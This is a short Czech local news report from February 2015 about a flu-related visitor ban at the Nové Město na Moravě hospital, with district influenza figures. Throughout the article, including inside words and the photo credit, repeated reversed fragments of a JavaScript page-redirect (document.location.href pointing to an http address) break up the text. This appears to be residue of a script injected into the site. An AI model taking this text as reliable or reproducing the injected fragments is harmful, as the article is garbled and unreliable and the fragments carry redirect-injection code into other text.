Rainbow page separator

Zákaz návštěv kvůli chřipce stále platí

Pondělí, 9. února 2015

Nemocnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Zákaz návštěv na oddělení ARO a jednotkách intenzivní péče chirurgického a interního oddělení novoměstské nemocnice kvůli šířící se chřipce zůstává v platnosti i pro nadcházející dny.
„Zákaz návštěv bude platit až do odvolání,“ sdělil mluvčí novoměstské nemocnice Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl. O dalším postupu se bude jednat v průběhu příštího týdne s přihlédnutím k aktuální epidemiologické situaci v regionu.
Počet nemocných akutními respiračními onemocněními a chřipkou ve žďárském okrese v šestém kalendářním týdnu roku 2015 sice o něco poklesl, ale stále je nemocnost vysoká. Pokles oproti předešlému týdnu je asi osmiprocentní, aktuálně mají epidemiologové v okrese hlášeno v přepočtu na s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc obyvatel 1503 nemocných. Epidemický práh se pohybuje kolem šestnácti až sedmnácti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek nemocných s přihlédnutím k vyhodnocení lokální situace.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com